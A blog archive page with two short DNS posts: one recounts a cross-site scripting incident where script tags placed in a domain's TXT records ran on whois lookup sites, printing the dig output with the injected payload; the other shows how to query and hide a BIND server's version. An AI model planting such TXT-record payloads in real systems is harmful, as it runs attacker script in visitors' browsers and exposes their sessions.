Category Archives: DNS

XSS via DNS

XSS (Cross-Site Scripting) attack is a type of injection, in which malicious scripts are injected into trusted web sites. Your browser has no way to know that the script should not be trusted, and will execute the script. In this case, the script can access any cookies, session tokens, or other sensitive information which can be passed to the attacker.

The golden rule “Do not trust user input” seems forgotten in some cases. The guy succeeded to inject malicious script via TXT record on his domain and the script is promptly executed when you check his domain via Whois services.

The vulnerable sites:
http://who.is/
http://mxtoolbox.com/
http://dig.whois.com.au/

Some of them are already patched but the taste remains đŸ™‚

The ycombinator discussion: https://news.ycombinator.com/item?id=8336025

The exact TXT content:

comp@comp ~ $ dig txt jamiehankins.co.uk
 
; <<>> DiG 9.9.5-3-Ubuntu <<>> txt jamiehankins.co.uk
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24931
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 3
 
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;jamiehankins.co.uk.		IN	TXT
 
;; ANSWER SECTION:
jamiehankins.co.uk.	300	IN	TXT	"google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"
jamiehankins.co.uk.	300	IN	TXT	"<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"
jamiehankins.co.uk.	300	IN	TXT	"v=spf1 include:spf.mandrillapp.com ?all"
jamiehankins.co.uk.	300	IN	TXT	"<script src='//peniscorp.com/topkek.js'></script>"
 
;; AUTHORITY SECTION:
jamiehankins.co.uk.	172800	IN	NS	hank.ns.cloudflare.com.
jamiehankins.co.uk.	172800	IN	NS	lucy.ns.cloudflare.com.
 
;; ADDITIONAL SECTION:
hank.ns.cloudflare.com.	11832	IN	A	173.245.59.116
hank.ns.cloudflare.com.	11832	IN	AAAA	2400:cb00:2049:1::adf5:3b74
 
;; Query time: 81 msec
;; SERVER: 127.0.1.1#53(127.0.1.1)
;; WHEN: Thu Sep 18 23:21:30 CEST 2014
;; MSG SIZE  rcvd: 481

How to test BIND version running on DNS server?

BIND, or Berkley Internet Name Domain, is an Internet naming system used for DNS, which allows you to find the sites you are looking for. BIND contains entries for DNS names, so for example, if you type www.bla.com into your browser, the record tells your browser at what IP address to find the site. If you need to test BIND version running on DNS server, you can use next commands:

Windows

nslookup -q=txt -class=CHAOS version.bind 192.168.51.250

Linux

#dig -t txt -c chaos VERSION.BIND @192.168.51.250

After this, you should get next answers

Windows

Server:  my.server.net
Address:  192.168.51.250
 
version.bind    text =
 
        "9.3.4-P1"
version.bind    nameserver = version.bind

The Linux users will have more details about server

[root@server ~]# dig -t txt -c chaos VERSION.BIND @192.168.51.250
 
; &lt;&lt;&gt;&gt; DiG 9.3.4-P1 &lt;&lt;&gt;&gt; -t txt -c chaos VERSION.BIND @192.168.51.250
; (1 server found)
;; global options:  printcmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 44906
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
 
;; QUESTION SECTION:
;VERSION.BIND.                  CH      TXT
 
;; ANSWER SECTION:
VERSION.BIND.           0       CH      TXT     "9.3.4-P1"
 
;; AUTHORITY SECTION:
VERSION.BIND.           0       CH      NS      VERSION.BIND.
 
;; Query time: 54 msec
;; SERVER: 192.168.51.250#53(192.168.51.250)
;; WHEN: Mon Mar 23 20:09:57 2009
;; MSG SIZE  rcvd: 65

To hide your version of bind, add the following value to named.conf (now the commands shown above won’t return Bind version)

options {
.....
version "[SECURED]";
};

Save named.conf and restarted named.

Remember the fact that Bind is the most popular Internet naming system but not the only one…